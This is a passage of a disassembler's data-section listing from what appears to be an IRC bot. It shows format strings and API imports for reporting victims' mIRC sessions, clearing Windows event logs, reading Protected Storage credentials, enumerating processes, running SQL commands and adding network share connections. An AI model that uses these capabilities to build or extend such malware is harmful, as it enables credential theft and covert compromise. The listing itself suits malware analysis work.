; sub_40A9FE+2770�o
aSUserIsRunning db '%s User is running mIRC v %s, Connected to %s (%s:%s) Nick: %s, O'
; DATA XREF: sub_40A9FE+2708�o
db 'n chans: (%s).',0
asc_441410 db ', ',0 ; DATA XREF: sub_40A9FE+2691�o
align 4
aChanI db '$chan(%i)',0 ; DATA XREF: sub_40A9FE+264B�o
align 10h
aChan0 db '$chan(0)',0 ; DATA XREF: sub_40A9FE+2602�o
align 4
aPort_0 db '$port',0 ; DATA XREF: sub_40A9FE+25C2�o
align 4
aServerip db '$serverip',0 ; DATA XREF: sub_40A9FE+2585�o
align 10h
aServer_0 db '$server',0 ; DATA XREF: sub_40A9FE+2542�o
aVersion db '$version',0 ; DATA XREF: sub_40A9FE+24B6�o
align 4
aMirc db 'mIRC',0 ; DATA XREF: sub_40A9FE+2466�o
; sub_41DA15+3C�o ...
align 4
aSSentIrcRawS_ db '%s Sent IRC raw: "%s".',0 ; DATA XREF: sub_40A9FE+2411�o
align 4
aSSOnSIThreadNu db '%s %s on %s: %i, thread number: %i.',0 ; DATA XREF: sub_40A9FE+22C6�o
; sub_40A9FE+22F6�o
aSSOnSISS_ db '%s %s on %s: %i, %s: %s.',0 ; DATA XREF: sub_40A9FE+223A�o
align 4
aSCreateProcess db '%s Create process thread.',0 ; DATA XREF: sub_40A9FE+20E5�o
align 10h
aSProcs db '%s Procs',0 ; DATA XREF: sub_40A9FE+1FB3�o
align 4
aSBkillS db '%s BKill %s',0 ; DATA XREF: sub_40A9FE+1D91�o
aSBkillThread_ db '%s BKill thread.',0 ; DATA XREF: sub_40A9FE+1D78�o
align 4
aS2maintenance_ db '%s /2Maintenance./2',0 ; DATA XREF: sub_40A9FE+1C45�o
aRecord db ', (Record)',0 ; DATA XREF: sub_40A9FE:loc_40C518�o
align 4
aRecordUptimeS_ db ', Record UpTime: (%s).',0 ; DATA XREF: sub_40A9FE+1AFB�o
align 4
aSUptimeS_ db '%s UpTime: (%s).',0 ; DATA XREF: sub_40A9FE+1AD1�o
align 4
aSSSSSSSSSS db '%s %s %s, %s %s (%s), %s (%s), %s (%s)',0 ; DATA XREF: sub_40A9FE+1A7B�o
align 10h
aSAndS db '%s and %s',0 ; DATA XREF: sub_40A9FE+1A2B�o
align 4
aSSOnSI_0 db '%s %s on: (%s:%i)',0 ; DATA XREF: sub_40A9FE+1855�o
; sub_40A9FE+187F�o
align 10h
aSSOnSI db '%s %s on: [%s:%i]',0 ; DATA XREF: sub_40A9FE+17A1�o
align 4
aSPstore db '%s PStore',0 ; DATA XREF: sub_40A9FE+1174�o
; sub_40A9FE+1242�o
align 10h
aSStarted_ db '%s started.',0 ; DATA XREF: sub_40A9FE+1039�o
aSThreadList db '%s Thread list',0 ; DATA XREF: sub_40A9FE+E88�o
align 4
aSSD_ db '%s %s (%d).',0 ; DATA XREF: sub_40A9FE+DF1�o
; sub_40A9FE+ED8�o ...
aSSS_0 db '%s %s (%s)',0 ; DATA XREF: sub_40A9FE+D4F�o
; sub_40A9FE+1B8E�o ...
align 4
aSDS db '%s %d %s',0 ; DATA XREF: sub_40A9FE+CCA�o
align 10h
aSAdvapi_dllNot db '%s Advapi.dll not loaded',0 ; DATA XREF: sub_40A9FE:loc_40B636�o
; sub_423846+69�o
align 4
aSFailedToClear db '%s Failed to clear syslogs',0 ; DATA XREF: sub_40A9FE+C2E�o
align 4
aSClearedDDSysl db '%s Cleared [%d/%d] syslogs',0 ; DATA XREF: sub_40A9FE+C1A�o
align 4
aSystem db 'system',0 ; DATA XREF: sub_40A9FE+BB9�o
; sub_41EBE9+26�o
align 4
aApplication db 'application',0 ; DATA XREF: sub_40A9FE+BAB�o
; sub_41EBE9+E�o
aSSS@S db '%s [%s!%s@%s]',0 ; DATA XREF: sub_40A9FE+B30�o
align 4
aSS_ db '%s %s.',0 ; DATA XREF: sub_40A9FE+AA8�o
; sub_40A9FE+FD5�o ...
align 10h
aUnsecured db 'Unsecured',0 ; DATA XREF: sub_40A9FE+A9E�o
align 4
aSSI db '%s %s (%i)',0 ; DATA XREF: sub_40A9FE+923�o
; sub_40A9FE+963�o
align 4
aSSIS db '%s %s (%i) %s',0 ; DATA XREF: sub_40A9FE+8EE�o
; sub_40A9FE+915�o
align 4
a6 db '$6',0 ; DATA XREF: sub_40A9FE+84E�o
align 4
a5 db '$5',0 ; DATA XREF: sub_40A9FE+83A�o
align 10h
a4 db '$4',0 ; DATA XREF: sub_40A9FE+823�o
align 4
a3 db '$3',0 ; DATA XREF: sub_40A9FE+80F�o
align 4
a2 db '$2',0 ; DATA XREF: sub_40A9FE+7FB�o
align 4
a1_0 db '$1',0 ; DATA XREF: sub_40A9FE+7E7�o
align 10h
aChan db '$chan',0 ; DATA XREF: sub_40A9FE+7D3�o
align 4
aUser_0 db '$user',0 ; DATA XREF: sub_40A9FE+7BD�o
align 10h
off_4416C0 dd offset dword_656D24 ; DATA XREF: sub_40A9FE+7A0�o
; sub_40A9FE+24FF�o
dword_4416C4 dd 73256325h, 0 aSAddedAliasS db '%s Added Alias: %s',0 ; DATA XREF: sub_40A9FE+6C7�o
align 10h
aS_1 db ' %s',0 ; DATA XREF: sub_40A9FE+67E�o
; sub_40A9FE+14BA�o ...
aD_SS db '%d. %s = %s',0 ; DATA XREF: sub_40A9FE+5D1�o
aSAliasList db '%s [Alias list]',0 ; DATA XREF: sub_40A9FE+57C�o
aSServerListCom db '%s Server List complete.',0 ; DATA XREF: sub_40A9FE+54B�o
align 4
aISDSS db '%i: %s:%d%s, %s',0 ; DATA XREF: sub_40A9FE+524�o
aListComplete db '-=[List Complete]=-',0 ; DATA XREF: sub_40A9FE+4E2�o
aSServerISDS db '%s: Server: [%i: %s:%d%s]',0 ; DATA XREF: sub_40A9FE+4BA�o
align 4
aSsl db ' (SSL)',0 ; DATA XREF: sub_40A9FE+489�o
; sub_40A9FE+508�o
align 4
aIexplore_exe db 'iexplore.exe',0 ; DATA XREF: sub_40A9FE+3C9�o
; sub_40A9FE+837A�o ...
align 8
dword_441778 dd 243F6A88h dd 85A308D3h, 13198A2Eh, 3707344h, 0A4093822h, 299F31D0h
dd 82EFA98h, 0EC4E6C89h, 452821E6h, 38D01377h, 0BE5466CFh
dd 34E90C6Ch, 0C0AC29B7h, 0C97C50DDh, 3F84D5B5h, 0B5470917h
dd 9216D5D9h, 8979FB1Bh
dword_4417C0 dd 0D1310BA6h dd 98DFB5ACh, 2FFD72DBh, 0D01ADFB7h, 0B8E1AFEDh, 6A267E96h
dd 0BA7C9045h, 0F12C7F99h, 24A19947h, 0B3916CF7h, 801F2E2h
dd 858EFC16h, 636920D8h, 71574E69h, 0A458FEA3h, 0F4933D7Eh
dd 0D95748Fh, 728EB658h, 718BCD58h, 82154AEEh, 7B54A41Dh
dd 0C25A59B5h, 9C30D539h, 2AF26013h, 0C5D1B023h, 286085F0h
dd 0CA417918h, 0B8DB38EFh, 8E79DCB0h, 603A180Eh, 6C9E0E8Bh
dd 0B01E8A3Eh, 0D71577C1h, 0BD314B27h, 78AF2FDAh, 55605C60h
dd 0E65525F3h, 0AA55AB94h, 57489862h, 63E81440h, 55CA396Ah
dd 2AAB10B6h, 0B4CC5C34h, 1141E8CEh, 0A15486AFh, 7C72E993h
dd 0B3EE1411h, 636FBC2Ah, 2BA9C55Dh, 741831F6h, 0CE5C3E16h
dd 9B87931Eh, 0AFD6BA33h, 6C24CF5Ch, 7A325381h, 28958677h
dd 3B8F4898h, 6B4BB9AFh, 0C4BFE81Bh, 66282193h, 61D809CCh
dd 0FB21A991h, 487CAC60h, 5DEC8032h, 0EF845D5Dh, 0E98575B1h
dd 0DC262302h, 0EB651B88h, 23893E81h, 0D396ACC5h, 0F6D6FF3h
dd 83F44239h, 2E0B4482h, 0A4842004h, 69C8F04Ah, 9E1F9B5Eh
dd 21C66842h, 0F6E96C9Ah, 670C9C61h, 0ABD388F0h, 6A51A0D2h
dd 0D8542F68h, 960FA728h, 0AB5133A3h, 6EEF0B6Ch, 137A3BE4h
dd 0BA3BF050h, 7EFB2A98h, 0A1F1651Dh, 39AF0176h, 66CA593Eh
dd 82430E88h, 8CEE8619h, 456F9FB4h, 7D84A5C3h, 3B8B5EBEh
dd 0E06F75D8h, 85C12073h, 401A449Fh, 56C16AA6h, 4ED3AA62h
dd 363F7706h, 1BFEDF72h, 429B023Dh, 37D0D724h, 0D00A1248h
dd 0DB0FEAD3h, 49F1C09Bh, 75372C9h, 80991B7Bh, 25D479D8h
dd 0F6E8DEF7h, 0E3FE501Ah, 0B6794C3Bh, 976CE0BDh, 4C006BAh
dd 0C1A94FB6h, 409F60C4h, 5E5C9EC2h, 196A2463h, 68FB6FAFh
dd 3E6C53B5h, 1339B2EBh, 3B52EC6Fh, 6DFC511Fh, 9B30952Ch
dd 0CC814544h, 0AF5EBD09h, 0BEE3D004h, 0DE334AFDh, 660F2807h
dd 192E4BB3h, 0C0CBA857h, 45C8740Fh, 0D20B5F39h, 0B9D3FBDBh
dd 5579C0BDh, 1A60320Ah, 0D6A100C6h, 402C7279h, 679F25FEh
dd 0FB1FA3CCh, 8EA5E9F8h, 0DB3222F8h, 3C7516DFh, 0FD616B15h
dd 2F501EC8h, 0AD0552ABh, 323DB5FAh, 0FD238760h, 53317B48h
dd 3E00DF82h, 9E5C57BBh, 0CA6F8CA0h, 1A87562Eh, 0DF1769DBh
dd 0D542A8F6h, 287EFFC3h, 0AC6732C6h, 8C4F5573h, 695B27B0h
dd 0BBCA58C8h, 0E1FFA35Dh, 0B8F011A0h, 10FA3D98h, 0FD2183B8h
dd 4AFCB56Ch, 2DD1D35Bh, 9A53E479h, 0B6F84565h, 0D28E49BCh
dd 4BFB9790h, 0E1DDF2DAh, 0A4CB7E33h, 62FB1341h, 0CEE4C6E8h
dd 0EF20CADAh, 36774C01h, 0D07E9EFEh, 2BF11FB4h, 95DBDA4Dh
dd 0AE909198h, 0EAAD8E71h, 6B93D5A0h, 0D08ED1D0h, 0AFC725E0h
dd 8E3C5B2Fh, 8E7594B7h, 8FF6E2FBh, 0F2122B64h, 8888B812h
dd 900DF01Ch, 4FAD5EA0h, 688FC31Ch, 0D1CFF191h, 0B3A8C1ADh
dd 2F2F2218h, 0BE0E1777h, 0EA752DFEh, 8B021FA1h, 0E5A0CC0Fh
dd 0B56F74E8h, 18ACF3D6h, 0CE89E299h, 0B4A84FE0h, 0FD13E0B7h
dd 7CC43B81h, 0D2ADA8D9h, 165FA266h, 80957705h, 93CC7314h
dd 211A1477h, 0E6AD2065h, 77B5FA86h, 0C75442F5h, 0FB9D35CFh
dd 0EBCDAF0Ch, 7B3E89A0h, 0D6411BD3h, 0AE1E7E49h, 250E2Dh
dd 2071B35Eh, 226800BBh, 57B8E0AFh, 2464369Bh, 0F009B91Eh
dd 5563911Dh, 59DFA6AAh, 78C14389h, 0D95A537Fh, 207D5BA2h
dd 2E5B9C5h, 83260376h, 6295CFA9h, 11C81968h, 4E734A41h
dd 0B3472DCAh, 7B14A94Ah, 1B510052h, 9A532915h, 0D60F573Fh
dd 0BC9BC6E4h, 2B60A476h, 81E67400h, 8BA6FB5h, 571BE91Fh
dd 0F296EC6Bh, 2A0DD915h, 0B6636521h, 0E7B9F9B6h, 0FF34052Eh
dd 0C5855664h, 53B02D5Dh, 0A99F8FA1h, 8BA4799h, 6E85076Ah
dd 4B7A70E9h, 0B5B32944h, 0DB75092Eh, 0C4192623h, 0AD6EA6B0h
dd 49A7DF7Dh, 9CEE60B8h, 8FEDB266h, 0ECAA8C71h, 699A17FFh
dd 5664526Ch, 0C2B19EE1h, 193602A5h, 75094C29h, 0A0591340h
dd 0E4183A3Eh, 3F54989Ah, 5B429D65h, 6B8FE4D6h, 99F73FD6h
dd 0A1D29C07h, 0EFE830F5h, 4D2D38E6h, 0F0255DC1h, 4CDD2086h
dd 8470EB26h, 6382E9C6h, 21ECC5Eh, 9686B3Fh, 3EBAEFC9h
dd 3C971814h, 6B6A70A1h, 687F3584h, 52A0E286h, 0B79C5305h
dd 0AA500737h, 3E07841Ch, 7FDEAE5Ch, 8E7D44ECh, 5716F2B8h
dd 0B03ADA37h, 0F0500C0Dh, 0F01C1F04h, 200B3FFh, 0AE0CF51Ah
dd 3CB574B2h, 25837A58h, 0DC0921BDh, 0D19113F9h, 7CA92FF6h
dd 94324773h, 22F54701h, 3AE5E581h, 37C2DADCh, 0C8B57634h
dd 9AF3DDA7h, 0A9446146h, 0FD0030Eh, 0ECC8C73Eh, 0A4751E41h
dd 0E238CD99h, 3BEA0E2Fh, 3280BBA1h, 183EB331h, 4E548B38h
dd 4F6DB908h, 6F420D03h, 0F60A04BFh, 2CB81290h, 24977C79h
dd 5679B072h, 0BCAF89AFh, 0DE9A771Fh, 0D9930810h, 0B38BAE12h
dd 0DCCF3F2Eh, 5512721Fh, 2E6B7124h, 501ADDE6h, 9F84CD87h
dd 7A584718h, 7408DA17h, 0BC9F9ABCh, 0E94B7D8Ch, 0EC7AEC3Ah
dd 0DB851DFAh, 63094366h, 0C464C3D2h, 0EF1C1847h, 3215D908h
dd 0DD433B37h, 24C2BA16h, 12A14D43h, 2A65C451h, 50940002h
dd 133AE4DDh, 71DFF89Eh, 10314E55h, 81AC77D6h, 5F11199Bh
dd 43556F1h, 0D7A3C76Bh, 3C11183Bh, 5924A509h, 0F28FE6EDh
dd 97F1FBFAh, 9EBABF2Ch, 1E153C6Eh, 86E34570h, 0EAE96FB1h
dd 860E5E0Ah, 5A3E2AB3h, 771FE71Ch, 4E3D06FAh, 2965DCB9h
dd 99E71D0Fh, 803E89D6h, 5266C825h, 2E4CC978h, 9C10B36Ah
dd 0C6150EBAh, 94E2EA78h, 0A5FC3C53h, 1E0A2DF4h, 0F2F74EA7h
dd 361D2B3Dh, 1939260Fh, 19C27960h, 5223A708h, 0F71312B6h
dd 0EBADFE6Eh, 0EAC31F66h, 0E3BC4595h, 0A67BC883h, 0B17F37D1h
dd 18CFF28h, 0C332DDEFh, 0BE6C5AA5h, 65582185h, 68AB9802h
dd 0EECEA50Fh, 0DB2F953Bh, 2AEF7DADh, 5B6E2F84h, 1521B628h
dd 29076170h, 0ECDD4775h, 619F1510h, 13CCA830h, 0EB61BD96h
dd 334FE1Eh, 0AA0363CFh, 0B5735C90h, 4C70A239h, 0D59E9E0Bh
dd 0CBAADE14h, 0EECC86BCh, 60622CA7h, 9CAB5CABh, 0B2F3846Eh
dd 648B1EAFh, 19BDF0CAh, 0A02369B9h, 655ABB50h, 40685A32h
dd 3C2AB4B3h, 319EE9D5h, 0C021B8F7h, 9B540B19h, 875FA099h
dd 95F7997Eh, 623D7DA8h, 0F837889Ah, 97E32D77h, 11ED935Fh
dd 16681281h, 0E358829h, 0C7E61FD6h, 96DEDFA1h, 7858BA99h
dd 57F584A5h, 1B227263h, 9B83C3FFh, 1AC24696h, 0CDB30AEBh
dd 532E3054h, 8FD948E4h, 6DBC3128h, 58EBF2EFh, 34C6FFEAh
dd 0FE28ED61h, 0EE7C3C73h, 5D4A14D9h, 0E864B7E3h, 42105D14h
dd 203E13E0h, 45EEE2B6h, 0A3AAABEAh, 0DB6C4F15h, 0FACB4FD0h
dd 0C742F442h, 0EF6ABBB5h, 654F3B1Dh, 41CD2105h, 0D81E799Eh
dd 86854DC7h, 0E44B476Ah, 3D816250h, 0CF62A1F2h, 5B8D2646h
dd 0FC8883A0h, 0C1C7B6A3h, 7F1524C3h, 69CB7492h, 47848A0Bh
dd 5692B285h, 95BBF00h, 0AD19489Dh, 1462B174h, 23820E00h
dd 58428D2Ah, 0C55F5EAh, 1DADF43Eh, 233F7061h, 3372F092h
dd 8D937E41h, 0D65FECF1h, 6C223BDBh, 7CDE3759h, 0CBEE7460h
dd 4085F2A7h, 0CE77326Eh, 0A6078084h, 19F8509Eh, 0E8EFD855h
dd 61D99735h, 0A969A7AAh, 0C50C06C2h, 5A04ABFCh, 800BCADCh
dd 9E447A2Eh, 0C3453484h, 0FDD56705h, 0E1E9EC9h, 0DB73DBD3h
dd 105588CDh, 675FDA79h, 0E3674340h, 0C5C43465h, 713E38D8h
dd 3D28F89Eh, 0F16DFF20h, 153E21E7h, 8FB03D4Ah, 0E6E39F2Bh
dd 0DB83ADF7h, 0E93D5A68h
dd 948140F7h, 0F64C261Ch, 94692934h, 411520F7h, 7602D4F7h
dd 0BCF46B2Eh, 0D4A20068h, 0D4082471h, 3320F46Ah, 43B7D4B7h
dd 500061AFh, 1E39F62Eh, 97244546h, 14214F74h, 0BF8B8840h
dd 4D95FC1Dh, 96B591AFh, 70F4DDD3h, 66A02F45h, 0BFBC09ECh
dd 3BD9785h, 7FAC6DD0h, 31CB8504h, 96EB27B3h, 55FD3941h
dd 0DA2547E6h, 0ABCA0A9Ah, 28507825h, 530429F4h, 0A2C86DAh
dd 0E9B66DFBh, 68DC1462h, 0D7486900h, 680EC0A4h, 27A18DEEh
dd 4F3FFEA2h, 0E887AD8Ch, 0B58CE006h, 7AF4D6B6h, 0AACE1E7Ch
dd 0D3375FECh, 0CE78A399h, 406B2A42h, 20FE9E35h, 0D9F385B9h
dd 0EE39D7ABh, 3B124E8Bh, 1DC9FAF7h, 4B6D1856h, 26A36631h
dd 0EAE397B2h, 3A6EFA74h, 0DD5B4332h, 6841E7F7h, 0CA7820FBh
dd 0FB0AF54Eh, 0D8FEB397h, 454056ACh, 0BA489527h, 55533A3Ah
dd 20838D87h, 0FE6BA9B7h, 0D096954Bh, 55A867BCh, 0A1159A58h
dd 0CCA92963h, 99E1DB33h, 0A62A4A56h, 3F3125F9h, 5EF47E1Ch
dd 9029317Ch, 0FDF8E802h, 4272F70h, 80BB155Ch, 5282CE3h
dd 95C11548h, 0E4C66D22h, 48C1133Fh, 0C70F86DCh, 7F9C9EEh
dd 41041F0Fh, 404779A4h, 5D886E17h, 325F51EBh, 0D59BC0D1h
dd 0F2BCC18Fh, 41113564h, 257B7834h, 602A9C60h, 0DFF8E8A3h
dd 1F636C1Bh, 0E12B4C2h, 2E1329Eh, 0AF664FD1h, 0CAD18115h
dd 6B2395E0h, 333E92E1h, 3B240B62h, 0EEBEB922h, 85B2A20Eh
dd 0E6BA0D99h, 0DE720C8Ch, 2DA2F728h, 0D0127845h, 95B794FDh
dd 647D0862h, 0E7CCF5F0h, 5449A36Fh, 877D48FAh, 0C39DFD27h
dd 0F33E8D1Eh, 0A476341h, 992EFF74h, 3A6F6EABh, 0F4F8FD37h
dd 0A812DC60h, 0A1EBDDF8h, 991BE14Ch, 0DB6E6B0Dh, 0C67B5510h
dd 6D672C37h, 2765D43Bh, 0DCD0E804h, 0F1290DC7h, 0CC00FFA3h
dd 0B5390F92h, 690FED0Bh, 667B9FFBh, 0CEDB7D9Ch, 0A091CF0Bh
dd 0D9155EA3h, 0BB132F88h, 515BAD24h, 7B9479BFh, 763BD6EBh
dd 37392EB3h, 0CC115979h, 8026E297h, 0F42E312Dh, 6842ADA7h
dd 0C66A2B3Bh, 12754CCCh, 782EF11Ch, 6A124237h, 0B79251E7h
dd 6A1BBE6h, 4BFB6350h, 1A6B1018h, 11CAEDFAh, 3D25BDD8h
dd 0E2E1C3C9h, 44421659h, 0A121386h, 0D90CEC6Eh, 0D5ABEA2Ah
dd 64AF674Eh, 0DA86A85Fh, 0BEBFE988h, 64E4C3FEh, 9DBC8057h
dd 0F0F7C086h, 60787BF8h, 6003604Dh, 0D1FD8346h, 0F6381FB0h
dd 7745AE04h, 0D736FCCCh, 83426B33h, 0F01EAB71h, 0B0804187h
dd 3C005E5Fh, 77A057BEh, 0BDE8AE24h, 55464299h, 0BF582E61h
dd 4E58F48Fh, 0F2DDFDA2h, 0F474EF38h, 8789BDC2h, 5366F9C3h
dd 0C8B38E74h, 0B475F255h, 46FCD9B9h, 7AEB2661h, 8B1DDF84h
dd 846A0E79h, 915F95E2h, 466E598Eh, 20B45770h, 8CD55591h
dd 0C902DE4Ch, 0B90BACE1h, 0BB8205D0h, 11A86248h, 7574A99Eh
dd 0B77F19B6h, 0E0A9DC09h, 662D09A1h, 0C4324633h, 0E85A1F02h
dd 9F0BE8Ch, 4A99A025h, 1D6EFE10h, 1AB93D1Dh, 0BA5A4DFh
dd 0A186F20Fh, 2868F169h, 0DCB7DA83h, 573906FEh, 0A1E2CE9Bh
dd 4FCD7F52h, 50115E01h, 0A70683FAh, 0A002B5C4h, 0DE6D027h
dd 9AF88C27h, 773F8641h, 0C3604C06h, 61A806B5h, 0F0177A28h
dd 0C0F586E0h, 6058AAh, 30DC7D62h, 11E69ED7h, 2338EA63h
dd 53C2DD94h, 0C2C21634h, 0BBCBEE56h, 90BCB6DEh, 0EBFC7DA1h
dd 0CE591D76h, 6F05E409h, 4B7C0188h, 39720A3Dh, 7C927C24h
dd 86E3725Fh, 724D9DB9h, 1AC15BB4h, 0D39EB8FCh, 0ED545578h
dd 8FCA5B5h, 0D83D7CD3h, 4DAD0FC4h, 1E50EF5Eh, 0B161E6F8h
dd 0A28514D9h, 6C51133Ch, 6FD5C7E7h, 56E14EC4h, 362ABFCEh
dd 0DDC6C837h, 0D79A3234h, 92638212h, 670EFA8Eh, 406000E0h
dd 3A39CE37h, 0D3FAF5CFh, 0ABC27737h, 5AC52D1Bh, 5CB0679Eh
dd 4FA33742h, 0D3822740h, 99BC9BBEh, 0D5118E9Dh, 0BF0F7315h
dd 0D62D1C7Eh, 0C700C47Bh, 0B78C1B6Bh, 21A19045h, 0B26EB1BEh
dd 6A366EB4h, 5748AB2Fh, 0BC946E79h, 0C6A376D2h, 6549C2C8h
dd 530FF8EEh, 468DDE7Dh, 0D5730A1Dh, 4CD04DC6h, 2939BBDBh
dd 0A9BA4650h, 0AC9526E8h, 0BE5EE304h, 0A1FAD5F0h, 6A2D519Ah
dd 63EF8CE2h, 9A86EE22h, 0C089C2B8h, 43242EF6h, 0A51E03AAh
dd 9CF2D0A4h, 83C061BAh, 9BE96A4Dh, 8FE51550h, 0BA645BD6h
dd 2826A2F9h, 0A73A3AE1h, 4BA99586h, 0EF5562E9h, 0C72FEFD3h
dd 0F752F7DAh, 3F046F69h, 77FA0A59h, 80E4A915h, 87B08601h
dd 9B09E6ADh, 3B3EE593h, 0E990FD5Ah, 9E34D797h, 2CF0B7D9h
dd 22B8B51h, 96D5AC3Ah, 17DA67Dh, 0D1CF3ED6h, 7C7D2D28h
dd 1F9F25CFh, 0ADF2B89Bh, 5AD6B472h, 5A88F54Ch, 0E029AC71h
dd 0E019A5E6h, 47B0ACFDh, 0ED93FA9Bh, 0E8D3C48Dh, 283B57CCh
dd 0F8D56629h, 79132E28h, 785F0191h, 0ED756055h, 0F7960E44h
dd 0E3D35E8Ch, 15056DD4h, 88F46DBAh, 3A16125h, 564F0BDh
dd 0C3EB9E15h, 3C9057A2h, 97271AECh, 0A93A072Ah, 1B3F6D9Bh
dd 1E6321F5h, 0F59C66FBh, 26DCF319h, 7533D928h, 0B155FDF5h
dd 3563482h, 8ABA3CBBh, 28517711h, 0C20AD9F8h, 0ABCC5167h
dd 0CCAD925Fh, 4DE81751h, 3830DC8Eh, 379D5862h, 9320F991h
dd 0EA7A90C2h, 0FB3E7BCEh, 5121CE64h, 774FBE32h, 0A8B6E37Eh
dd 0C3293D46h, 48DE5369h, 6413E680h, 0A2AE0810h, 0DD6DB224h
dd 69852DFDh, 9072166h, 0B39A460Ah, 6445C0DDh, 586CDECFh
dd 1C20C8AEh, 5BBEF7DDh, 1B588D40h, 0CCD2017Fh, 6BB4E3BBh
dd 0DDA26A7Eh, 3A59FF45h, 3E350A44h, 0BCB4CDD5h, 72EACEA8h
dd 0FA6484BBh, 8D6612AEh, 0BF3C6F47h, 0D29BE463h, 542F5D9Eh
dd 0AEC2771Bh, 0F64E6370h, 740E0D8Dh, 0E75B1357h, 0F8721671h
dd 0AF537D5Dh, 4040CB08h, 4EB4E2CCh, 34D2466Ah, 115AF84h
dd 0E1B00428h, 95983A1Dh, 6B89FB4h, 0CE6EA048h, 6F3F3B82h
dd 3520AB82h, 11A1D4Bh, 277227F8h, 611560B1h, 0E7933FDCh
dd 0BB3A792Bh, 344525BDh, 0A08839E1h, 51CE794Bh, 2F32C9B7h
dd 0A01FBAC9h, 0E01CC87Eh, 0BCC7D1F6h, 0CF0111C3h, 0A1E8AAC7h
dd 1A908749h, 0D44FBD9Ah, 0D0DADECBh, 0D50ADA38h, 339C32Ah
dd 0C6913667h, 8DF9317Ch, 0E0B12B4Fh, 0F79E59B7h, 43F5BB3Ah
dd 0F2D519FFh, 27D9459Ch, 0BF97222Ch, 15E6FC2Ah, 0F91FC71h
dd 9B941525h, 0FAE59361h, 0CEB69CEBh, 0C2A86459h, 12BAA8D1h
dd 0B6C1075Eh, 0E3056A0Ch, 10D25065h, 0CB03A442h, 0E0EC6E0Eh
dd 1698DB3Bh, 4C98A0BEh, 3278E964h, 9F1F9532h, 0E0D392DFh
dd 0D3A0342Bh, 8971F21Eh, 1B0A7441h, 4BA3348Ch, 0C5BE7120h
dd 0C37632D8h, 0DF359F8Dh, 9B992F2Eh, 0E60B6F47h, 0FE3F11Dh
dd 0E54CDA54h, 1EDAD891h, 0CE6279CFh, 0CD3E7E6Fh, 1618B166h
dd 0FD2C1D05h, 848FD2C5h, 0F6FB2299h, 0F523F357h, 0A6327623h
dd 93A83531h, 56CCCD02h, 0ACF08162h, 5A75EBB5h, 6E163697h
dd 88D273CCh, 0DE966292h, 81B949D0h, 4C50901Bh, 71C65614h
dd 0E6C6C7BDh, 327A140Ah, 45E1D006h, 0C3F27B9Ah, 0C9AA53FDh
dd 62A80F00h, 0BB25BFE2h, 35BDD2F6h, 71126905h, 0B2040222h
dd 0B6CBCF7Ch, 0CD769C2Bh, 53113EC0h, 1640E3D3h, 38ABBD60h
dd 2547ADF0h, 0BA38209Ch, 0F746CE76h, 77AFA1C5h, 20756060h
dd 85CBFE4Eh, 8AE88DD8h, 7AAAF9B0h, 4CF9AA7Eh, 1948C25Ch
dd 2FB8A8Ch, 1C36AE4h, 0D6EBE1F9h, 90D4F869h, 0A65CDEA0h
dd 3F09252Dh, 0C208E69Fh, 0B74E6132h, 0CE77E25Bh, 578FDFE3h
dd 3AC372E6h, 0
dd 0E7h dup(0)
off_442B60 dd offset dword_442BA8 ; DATA XREF: sub_4170BC:loc_4170BE�r
; sub_4170D6+E3�r ...
align 8
dword_442B68 dd 80h, 0Eh dup(0) dd 80000000h
dword_442BA8 dd 31302F2Eh, 35343332h, 39383736h, 64636261h, 68676665h
; DATA XREF: .text:off_442B60�o
dd 6C6B6A69h, 706F6E6Dh, 74737271h, 78777675h, 42417A79h
dd 46454443h, 4A494847h, 4E4D4C4Bh, 5251504Fh, 56555453h
dd 5A595857h, 0A4A3A2A1h, 0A8A7A6A5h, 0ACABAAA9h, 0B0AFAEADh
dd 0B4B3B2B1h, 0B8B7B6B5h, 0BCBBBAB9h, 0C0BFBEBDh, 0C4C3C2C1h
dd 0C8C7C6C5h, 0CCCBCAC9h, 0D0CFCECDh, 0D4D3D2D1h, 0D8D7D6D5h
dd 0DCDBDAD9h, 0E0DFDEDDh, 0E4E3E2E1h, 0E8E7E6E5h, 0ECEBEAE9h
dd 0F0EFEEEDh, 0F4F3F2F1h, 0F8F7F6F5h, 0FCFBFAF9h, 0FFFEFDh
a02x02x02x02x02 db '%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x',0
; DATA XREF: sub_415506+64�o
align 4
aS_3 db '+%s',0 ; DATA XREF: sub_415603+26�o
aPathremovefile db 'PathRemoveFileSpecA',0 ; DATA XREF: sub_417362+F2D�o
aShlwapi_dll db 'shlwapi.dll',0 ; DATA XREF: sub_417362:loc_418284�o
aPstorecreatein db 'PStoreCreateInstance',0 ; DATA XREF: sub_417362+EFE�o
align 4
aPstorec_dll db 'pstorec.dll',0 ; DATA XREF: sub_417362:loc_418255�o
aGetprocessmemo db 'GetProcessMemoryInfo',0 ; DATA XREF: sub_417362+EA2�o
align 4
aEnumprocesses db 'EnumProcesses',0 ; DATA XREF: sub_417362+E95�o
align 4
aEnumprocessmod db 'EnumProcessModules',0 ; DATA XREF: sub_417362+E88�o
align 10h
aGetmodulebasen db 'GetModuleBaseNameA',0 ; DATA XREF: sub_417362+E7B�o
align 4
aGetmodulefilen db 'GetModuleFileNameExA',0 ; DATA XREF: sub_417362+E73�o
align 4
aPsapi_dll db 'psapi.dll',0 ; DATA XREF: sub_417362:loc_4181C8�o
align 4
aSqldisconnect db 'SQLDisconnect',0 ; DATA XREF: sub_417362+E11�o
align 4
aSqlfreehandle db 'SQLFreeHandle',0 ; DATA XREF: sub_417362+E04�o
align 4
aSqlallochandle db 'SQLAllocHandle',0 ; DATA XREF: sub_417362+DF7�o
align 4
aSqlexecdirect db 'SQLExecDirect',0 ; DATA XREF: sub_417362+DEA�o
align 4
aSqlsetenvattr db 'SQLSetEnvAttr',0 ; DATA XREF: sub_417362+DDD�o
align 4
aSqldriverconne db 'SQLDriverConnect',0 ; DATA XREF: sub_417362+DD5�o
align 4
aOdbc32_dll db 'odbc32.dll',0 ; DATA XREF: sub_417362:loc_41812A�o
align 4
aShchangenotify db 'SHChangeNotify',0 ; DATA XREF: sub_417362+D93�o
align 4
aShellexecutea db 'ShellExecuteA',0 ; DATA XREF: sub_417362+D8B�o
align 4
aShell32_dll db 'shell32.dll',0 ; DATA XREF: sub_417362:loc_4180E0�o
aWnetcancelco_0 db 'WNetCancelConnection2W',0 ; DATA XREF: sub_417362+D39�o
align 4
aWnetcancelconn db 'WNetCancelConnection2A',0 ; DATA XREF: sub_417362+D2C�o
align 4
aWnetaddconne_0 db 'WNetAddConnection2W',0 ; DATA XREF: sub_417362+D1F�o
